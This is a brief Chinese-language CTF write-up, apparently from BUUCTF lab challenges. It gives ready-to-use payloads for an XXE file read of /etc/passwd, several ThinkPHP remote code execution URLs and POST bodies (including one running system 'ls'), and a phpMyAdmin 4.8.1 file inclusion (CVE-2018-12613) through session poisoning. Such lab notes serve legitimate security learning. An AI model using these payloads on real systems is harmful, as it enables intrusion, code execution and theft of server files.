1.[PHP]XXE
libxml2.9.0以后,默認不解析外部實體,導致XXE漏洞逐漸消亡
dom.php、SimpleXMLElement.php、simplexml_load_string.php均可觸發XXE漏洞
用burp抓包,在后方修改加入payload
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
<name>&xxe;</name>
</root>
2.[ThinkPHP]5-Rce
Thinkphp5 5.0.22/5.1.29遠程代碼執行漏洞:
直接在網址后面加,在phpinfo中找到flag
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
3.[ThinkPHP]5.0.23-Rce
遠程執行漏洞
用hackbar構造如下內容
POST /?s=captcha
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=-1&method=get
4.[ThinkPHP]2-Rce
ThinkPHP 2.x 的任意代碼執行漏洞
payload:
http://node3.buuoj.cn:29851/index.php?s=/index/index/name/$%7B@phpinfo()%7D
直接顯示phpinfo
5.[PHPMYADMIN]CVE-2018-12613
phpmyadmin 4.8.1 遠程文件包含漏洞 (CVE-2018-12613)
SELECT '<?=phpinfo()?>';
進入查看session
利用session構造payload
http://node3.buuoj.cn:25034/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_02cc9bb1299867829f635ebcf8ec15df
成功得到flag